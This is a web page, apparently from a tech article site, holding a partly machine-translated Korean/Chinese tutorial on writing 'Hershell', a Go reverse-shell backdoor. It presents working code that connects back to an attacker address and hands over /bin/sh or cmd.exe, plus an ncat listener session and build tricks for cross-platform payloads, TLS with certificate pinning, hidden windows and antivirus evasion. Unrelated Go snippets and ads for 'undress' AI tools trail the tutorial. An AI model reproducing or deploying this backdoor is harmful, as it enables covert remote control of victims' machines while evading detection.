Go 언어는 침투 테스트에 사용될 수 있습니다. Go를 사용하면 외부 종속성 없이도 크로스 컴파일을 매우 쉽게 수행할 수 있습니다. 표준 라이브러리 덕분에 Go 바이너리에는 대상 아키텍처에서 실행하는 데 필요한 모든 코드가 포함되어 있으므로 Go 언어를 사용하면 동일한 소스 코드에서 여러 플랫폼용 바이너리를 쉽게 빌드할 수 있습니다.
이 튜토리얼의 운영 환경: Windows 7 시스템, GO 버전 1.18, Dell G3 컴퓨터.
침투 테스트란 무엇입니까
침투 테스트는 보안을 평가하기 위해 컴퓨터 시스템에 대한 승인된 시뮬레이션 공격이며 네트워크 방어가 의도한 대로 작동하는지 보여주기 위해 제공됩니다. 회사에서 정기적으로 보안 정책 및 절차를 업데이트하고, 수시로 시스템에 패치를 적용하고, 취약점 스캐너와 같은 도구를 사용하여 모든 패치가 적용되도록 한다고 가정해 보겠습니다.
Go 언어는 침투 테스트에 사용될 수 있습니다
다음은 예입니다: 리바운드 백도어 작성 Hershell
침투 테스트 과정에서 필수 도구는 잘 알려져 있고 매우 멋진 Metasploit 프레임워크입니다. .
이 환경에는 수많은 페이로드, 인코더 및 기타 도구가 포함되어 있습니다. Meterpreter는 이러한 페이로드 중에서 중요합니다. 이는 개발되고 악용된 명령이 포함된 수정된 버전의 셸입니다. 강력한 공격 특성으로 인해 이 포탄이 아마도 가장 일반적으로 사용되는 포탄일 것입니다.
Meterpreter 문제
안타깝게도 Meterpreter의 인기에는 단점이 있습니다. 대부분의 바이러스 백신 및 서명 기반 솔루션에서 감지됩니다. 일반적으로 침투 테스트 중에 Meterpreter 페이로드가 포함된 바이너리가 감지되어 격리를 위해 전송됩니다.
또 다른 문제는 특정 대상 아키텍처(예: BSD)에 대한 지원이 부족하여 자체 백도어를 개발해야 한다는 점입니다.
위의 문제로 인해 Hershell을 작성하게 되었습니다. 이 프로젝트의 목표는 크로스 플랫폼이며 안티 바이러스 소프트웨어로 감지할 수 없는 단일 소스 코드를 기반으로 하는 리버스 셸 페이로드를 제공하는 것입니다.
Google에서 개발한 컴파일 언어인 Go 언어를 사용하여 개발합니다.
GO 언어를 사용하는 이유는 무엇인가요?
요즘 Python은 특히 보안 분야에서 스크립트를 작성하고 애플리케이션을 완성하는 데 가장 널리 사용되는 언어일 것입니다. 그렇다면 우리가 새로운 언어를 배워야 하는 이유는 무엇입니까?
Go에는 Python이나 다른 언어에 비해 한 가지 장점이 있습니다. 외부 종속성 없이 크로스 컴파일을 수행하는 것이 매우 쉽습니다. 표준 라이브러리 덕분에 Go 바이너리에는 대상 아키텍처에서 실행하는 데 필요한 모든 코드가 포함되어 있습니다. 따라서 Go 언어를 사용하면 동일한 소스 코드에서 여러 플랫폼용 바이너리를 쉽게 빌드할 수 있습니다.
목표
이 코드를 빌드할 때 우리는 다음 목표를 달성하고자 합니다:
payload类型是reverse shell; 得到一个跨多个平台(Windows、Linux、MacOS、ARM)和硬件架构的payload; 容易配置; 加密通信; 绕过大多数反病毒检测引擎。
환경 준비
원하는 배포판에서 Go 패키지를 설치하거나 공식 웹사이트에서 다운로드하세요.
설치가 완료되면 환경을 구성해야 합니다. 소스, 라이브러리 및 빌드 바이너리의 루트가 될 dev 디렉터리를 만듭니다.
$ mkdir -p $HOME/dev/{src,bin,pkg}
$ export GOPATH=$HOME/dev
$ cd dev
디렉터리는 아래 계획을 따릅니다.
bin包含编译后的二进制文件和其他可执行文件;
pkg包含Go下载包的对象文件;
src包含你的应用程序和下载包的源目录。
첫 번째 역방향 쉘
먼저 간단한 TCP 역방향을 만듭니다. Go 언어를 사용하는 쉘.
여기에는 코드를 한 줄씩 주석 처리한 것이 아니라 완전히 주석 처리한 버전이 있습니다.
// filename: tcp.go
package main
import (
"net" // requirement to establish a connection
"os" // requirement to call os.Exit()
"os/exec" // requirement to execute commands against the target system
)
func main() {
// Connecting back to the attacker
// If it fails, we exit the program
conn, err := net.Dial("tcp", "192.168.0.23:2233")
if err != nil {
os.Exit(1)
}
// Creating a /bin/sh process
cmd := exec.Command("/bin/sh")
// Connecting stdin and stdout
// to the opened connection
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
// Run the process
cmd.Run()
}
먼저 net.Dial을 사용하여 원격 서버에 연결합니다. Go 표준 라이브러리의 net 패키지는 TCP 또는 UDP 기반 네트워크 통신을 위한 추상화 계층입니다.
패키지 사용 방법에 대해 자세히 알아보고 문서화(go doc)하는 것이 도움이 됩니다.
$ go doc net
package net // import "net"
Package net provides a portable interface for network I/O, including TCP/IP,
UDP, domain name resolution, and Unix domain sockets.
Although the package provides access to low-level networking primitives,
most clients will need only the basic interface provided by the Dial,
Listen, and Accept functions and the associated Conn and Listener
interfaces. The crypto/tls package uses the same interfaces and similar Dial
and Listen functions.
...
스크립트로 돌아가겠습니다.
연결이 설정되면(실패하면 프로그램이 중지됨) exec.Command 함수 덕분에 프로세스(exec.Cmd 유형의 객체)를 생성합니다. 모든 입력 및 출력(stdout, stdin 및 stderr)이 연결로 리디렉션되고 프로세스가 시작됩니다.
그런 다음 파일을 컴파일할 수 있습니다.
$ go build tcp.go
$ ./tcp
이제 리스너를 활성화해야 합니다.
# Listening server (attacker)
$ ncat -lvp 2233
Listening on [0.0.0.0] (family 0, port 2233)
Connection from 192.168.0.20 38422 received!
id
uid=1000(lab) gid=100(users) groupes=100(users)
如预期的那样,我们得到了reverse shell。
到目前为止我们大多数的目标尚未实现。
配置
我们现在有一些reverse shell基本代码。但是在每次编译之后我们必须修改,以便定义攻击者的监听端口和IP地址。
这种操作虽然不是很便利。但这里可以引入一个简单的小技巧:在连接时(在编译之前)进行变量定义。
事实上,在构建过程中,可以定义一些变量的值(使用go build命令)。
这是使用前面代码的一个简短的例子:
// filename: tcp.go
package main
import (
"net"
"os"
"os/exec"
)
// variable to be defined at compiling time
var connectString string
func main() {
if len(connectString) == 0 {
os.Exit(1)
}
conn, err := net.Dial("tcp", connectString)
if err != nil {
os.Exit(1)
}
cmd := exec.Command("/bin/sh")
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()
}
我们只添加下面一行代码,进行一个安全测试以检查它是否包含一个值:
var connectString string
其代码编译如下:
$ go build --ldflags "-X main.connectString=192.168.0.23:2233" tcp.go
当我们构建二进制文件时,攻击者的IP地址和端口可以被动态定义。
注意,可以以package.nomVariable的模式访问这些变量,并且这些变量只能是string类型。
为了简化编译,我们可以创建一个Makefile:
# Makefile
SOURCE=tcp.go
BUILD=go build
OUTPUT=reverse_shell
LDFLAGS=--ldflags "-X main.connectString=${LHOST}:${LPORT}"
all:
${BUILD} ${LDFLAGS} -o ${OUTPUT} ${SOURCE}
clean:
rm -f ${OUTPUT}
本文的其余部分,我们将使用LHOST和LPORT环境变量来定义设置:
$ make LHOST=192.168.0.23 LPORT=2233
go build --ldflags "-X main.connectString=192.168.0.23:2233" -o reverse_shell tcp.go
跨平台
既然可以很容易地配置 payload,也可以跨平台使用它。
如前所述,payload的强项之一是从同一个代码库使用Go语言为各种架构和平台进行构建。
准确地说, runtime提供了GOOS和GOARCH变量。
让我们看看如何使用GOOS:
// filename: tcp_multi.go
package main
import (
"net"
"os"
"os/exec"
"runtime" // requirement to access to GOOS
)
var connectString string
func main() {
var cmd *exec.Cmd
if len(connectString) == 0 {
os.Exit(1)
}
conn, err := net.Dial("tcp", connectString)
if err != nil {
os.Exit(1)
}
switch runtime.GOOS {
case "windows":
cmd = exec.Command("cmd.exe")
case "linux":
cmd = exec.Command("/bin/sh")
case "freebsd":
cmd = exec.Command("/bin/csh")
default:
cmd = exec.Command("/bin/sh")
}
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()
}
很显然,我们添加了一个switch模块来处理GOOS不同的值。因此,我们只是检查几个操作系统的值,并且改变每个目标进程。
上面的代码可以进一步简化,实际上除了Windows,大多数操作系统上都有/bin/sh:
switch runtime.GOOS {
case "windows":
// Windows specific branch
cmd = exec.Command("cmd.exe")
default:
// any other OS
cmd = exec.Command("/bin/sh")
}
现在,使用GOARCH处理交叉编译架构非常简单:
$ make GOOS=windows GOARCH=amd64 LHOST=192.168.0.23 LPORT=2233
go build --ldflags "-X main.connectString=192.168.0.23:2233" -o reverse_shell tcp_multi.go
$ file reverse_shell
reverse_shell: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
网络加密
现在,让我们看看如何加密网络流量。
有几种选择:
用一个自制的方法,在应用程序层建立加密
使用一种被广泛使用并且在会话层测试协议的方法,即TLS。
鉴于我们都倾向于简单和安全,我们选择了很容易用Go语言实现的TLS。标准库已经支持一切支持TLS的东西。
在客户端,一个新的&tls.Config类型对象需要配置连接,比如证书锁定(certificate pinning)。
这是新的代码库,进行了轻微的优化和TLS处理:
import (
"crypto/tls"
"runtime"
"os"
"os/exec"
"net"
)
var connectString string
func GetShell(conn net.Conn) {
var cmd *exec.Cmd
switch runtime.GOOS {
case "windows":
cmd = exec.Command("cmd.exe")
default:
cmd = exec.Command("/bin/sh")
}
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Stdin = conn
cmd.Run()
}
func Reverse(connectString string) {
var (
conn *tls.Conn
err error
)
// Creation of the tls.Config object
// Accepting *any* server certificate
config := &tls.Config{InsecureSkipVerify: true}
if conn, err = tls.Dial("tcp", connectString, config); err != nil {
os.Exit(-1)
}
defer conn.Close()
// Starting the shell
GetShell(conn)
}
func main() {
if len(connectString) == 0 {
os.Exit(1)
}
Reverse(connectString)
}
如示例所示,创建一个TLS套接字(socket)非常类似于创建一个简单的TCP socket。不同于tls.Config,tls.Conn对象与net.Conn以相同的方式被使用。
条件编译
如上图所示,可以改变取决于目标操作系统的程序执行。
然而,如果你想使用这段代码,你会注意到一个问题。cmd.exe窗口会出现,并且无法隐藏,从而会提醒受害者。
幸运的是,exec.Cmd对象的SysProcAttr可以改变这种情况,如本文所述:
$ go doc exec.Cmd
...
// SysProcAttr holds optional, operating system-specific attributes.
// Run passes it to os.StartProcess as the os.ProcAttr's Sys field.
SysProcAttr *syscall.SysProcAttr
...
在Linux下,关于syscall.SysProcAttr模块文件,我们得到以下信息:
$ go doc syscall.SysProcAttr
type SysProcAttr struct {
Chroot string // Chroot.
Credential *Credential // Credential.
Ptrace bool // Enable tracing.
Setsid bool // Create session.
Setpgid bool // Set process group ID to Pgid, or, if Pgid == 0, to new pid.
Setctty bool // Set controlling terminal to fd Ctty (only meaningful if Setsid is set)
Noctty bool // Detach fd 0 from controlling terminal
Ctty int // Controlling TTY fd
Foreground bool // Place child's process group in foreground. (Implies Setpgid. Uses Ctty as fd of controlling TTY)
Pgid int // Child's process group ID if Setpgid.
Pdeathsig Signal // Signal that the process will get when its parent dies (Linux only)
Cloneflags uintptr // Flags for clone calls (Linux only)
Unshareflags uintptr // Flags for unshare calls (Linux only)
UidMappings []SysProcIDMap // User ID mappings for user namespaces.
GidMappings []SysProcIDMap // Group ID mappings for user namespaces.
// GidMappingsEnableSetgroups enabling setgroups syscall.
// If false, then setgroups syscall will be disabled for the child process.
// This parameter is no-op if GidMappings == nil. Otherwise for unprivileged
// users this should be set to false for mappings work.
GidMappingsEnableSetgroups bool
}
然而,在syscall package(包)的源代码中,我们观察到每一个构建都有一个特定的实现。
此外,在Windows的exec子方式中,我们注意到SysProcAttr结构有不同的定义。它有一个HidWindow属性(布尔类型),当启动一个程序时这一属性允许隐藏启动窗口。
该属性也正是我们的后门需要的。
我们可能会被这一实现所吸引:
...
switch runtime.GOOS {
case "windows":
cmd := exec.Cmd("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
default:
cmd := exec.Cmd("/bin/sh")
}
...
然而,由于HideWindow属性在syscall/exec_linux.go中不存在,因此这种编译在除了Windows之外的任何其他平台可能会失败。
因此,我们需要调整我们的项目的结构,使用条件编译。条件编译指的是一种特性,允许添加源代码文件顶部编译器的命令。例如,如果我们想要编译一个只适用于Windows操作系统的源文件,我们将添加该命令:
// +build windows !linux !darwin !freebsd
import net
...
当GOOS变量设置为darwin、 linux 或者freebsd时,该命令将指示编译器不包括该文件。当然,当值与windows匹配时,编译器将包含该源文件。
为了在我们的项目中实现该条件编译,我们将遵循这个结构:
$ tree
├── hershell.go
├── Makefile
├── README.md
└── shell
├── shell_default.go
└── shell_windows.go
hershell.go包含程序的核心部分。然后,我们创建一个名为shell的模块,该模块有两个文件:适用于Linux和Unix的shell_default.go文件;以及适用于Windows的shell_windows.go文件。
证书锁定
使用TLS安全通信是件好事,但只要我们不对服务器进行身份验证,流量仍然可以被“中间人”劫持。
为了预防这种攻击,我们将验证服务器提供的证书,这就叫做“证书锁定(certificate pinning)”。
以下函数负责证书锁定(certificate pinning):
func CheckKeyPin(conn *tls.Conn, fingerprint []byte) (bool, error) {
valid := false
connState := conn.ConnectionState()
for _, peerCert := range connState.PeerCertificates {
hash := sha256.Sum256(peerCert.Raw)
if bytes.Compare(hash[0:], fingerprint) == 0 {
valid = true
}
}
return valid, nil
}
这个函数接受一个tls.Conn对象的指针作为参数,并且包含SHA256格式的指纹证书的一个字节数组。在连接过程中,该代码扫描所有tls.Conn中的PeerCertificates,直到发现与提供的相匹配的指纹为止。
如果碰巧没有证书匹配,函数返回false。
当需要建立与远程服务器的连接时,我们只需要调用该函数;如果提交的证书是无效的则会关闭连接:
func Reverse(connectString string, fingerprint []byte) {
var (
conn *tls.Conn
err error
)
config := &tls.Config{InsecureSkipVerify: true}
if conn, err = tls.Dial("tcp", connectString, config); err != nil {
os.Exit(ERR_HOST_UNREACHABLE)
}
defer conn.Close()
// checking the certificate fingerprint
if ok, err := CheckKeyPin(conn, fingerprint); err != nil || !ok {
os.Exit(ERR_BAD_FINGERPRINT)
}
RunShell(conn)
}
最初,由于–ldflags,在编译(在Makefile中)过程中可以生成有效的指纹:
...
LINUX_LDFLAGS=--ldflags "-X main.connectString=${LHOST}:${LPORT} -X main.connType=${TYPE} -X main.fingerPrint=$$(openssl x509 -fingerprint -sha256 -noout -in ${SRV_PEM} | cut -d '=' -f2)"
...
위 내용은 침투 테스트에 Go 언어를 사용할 수 있나요?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

Golang은 실제 응용 분야에서 탁월하며 단순성, 효율성 및 동시성으로 유명합니다. 1) 동시 프로그래밍은 Goroutines 및 채널을 통해 구현됩니다. 2) Flexible Code는 인터페이스 및 다형성을 사용하여 작성됩니다. 3) NET/HTTP 패키지로 네트워크 프로그래밍 단순화, 4) 효율적인 동시 크롤러 구축, 5) 도구 및 모범 사례를 통해 디버깅 및 최적화.

GO의 핵심 기능에는 쓰레기 수집, 정적 연결 및 동시성 지원이 포함됩니다. 1. Go Language의 동시성 모델은 고루틴 및 채널을 통한 효율적인 동시 프로그래밍을 실현합니다. 2. 인터페이스 및 다형성은 인터페이스 방법을 통해 구현되므로 서로 다른 유형을 통일 된 방식으로 처리 할 수 있습니다. 3. 기본 사용법은 기능 정의 및 호출의 효율성을 보여줍니다. 4. 고급 사용에서 슬라이스는 동적 크기 조정의 강력한 기능을 제공합니다. 5. 레이스 조건과 같은 일반적인 오류는 Getest-race를 통해 감지 및 해결할 수 있습니다. 6. 성능 최적화는 sync.pool을 통해 개체를 재사용하여 쓰레기 수집 압력을 줄입니다.

Go Language는 효율적이고 확장 가능한 시스템을 구축하는 데 잘 작동합니다. 장점은 다음과 같습니다. 1. 고성능 : 기계 코드로 컴파일, 빠른 달리기 속도; 2. 동시 프로그래밍 : 고어 라틴 및 채널을 통한 멀티 태스킹 단순화; 3. 단순성 : 간결한 구문, 학습 및 유지 보수 비용 절감; 4. 크로스 플랫폼 : 크로스 플랫폼 컴파일, 쉬운 배포를 지원합니다.

SQL 쿼리 결과의 정렬에 대해 혼란스러워합니다. SQL을 학습하는 과정에서 종종 혼란스러운 문제가 발생합니다. 최근 저자는 "Mick-SQL 기본 사항"을 읽고 있습니다.

기술 스택 컨버전스와 기술 선택의 관계, 소프트웨어 개발에서 기술 스택의 선택 및 관리는 매우 중요한 문제입니다. 최근에 일부 독자들은 ...

골란 ...

GO 언어로 세 가지 구조를 비교하고 처리하는 방법. GO 프로그래밍에서는 때때로 두 구조의 차이점을 비교하고 이러한 차이점을 ...에 적용해야합니다.

GO에서 전 세계적으로 설치된 패키지를 보는 방법? Go Language로 발전하는 과정에서 Go는 종종 사용합니다 ...


핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

AI Hentai Generator
AI Hentai를 무료로 생성하십시오.

인기 기사

뜨거운 도구

Atom Editor Mac 버전 다운로드
가장 인기 있는 오픈 소스 편집기

맨티스BT
Mantis는 제품 결함 추적을 돕기 위해 설계된 배포하기 쉬운 웹 기반 결함 추적 도구입니다. PHP, MySQL 및 웹 서버가 필요합니다. 데모 및 호스팅 서비스를 확인해 보세요.

ZendStudio 13.5.1 맥
강력한 PHP 통합 개발 환경

에디트플러스 중국어 크랙 버전
작은 크기, 구문 강조, 코드 프롬프트 기능을 지원하지 않음

SecList
SecLists는 최고의 보안 테스터의 동반자입니다. 보안 평가 시 자주 사용되는 다양한 유형의 목록을 한 곳에 모아 놓은 것입니다. SecLists는 보안 테스터에게 필요할 수 있는 모든 목록을 편리하게 제공하여 보안 테스트를 더욱 효율적이고 생산적으로 만드는 데 도움이 됩니다. 목록 유형에는 사용자 이름, 비밀번호, URL, 퍼징 페이로드, 민감한 데이터 패턴, 웹 셸 등이 포함됩니다. 테스터는 이 저장소를 새로운 테스트 시스템으로 간단히 가져올 수 있으며 필요한 모든 유형의 목록에 액세스할 수 있습니다.
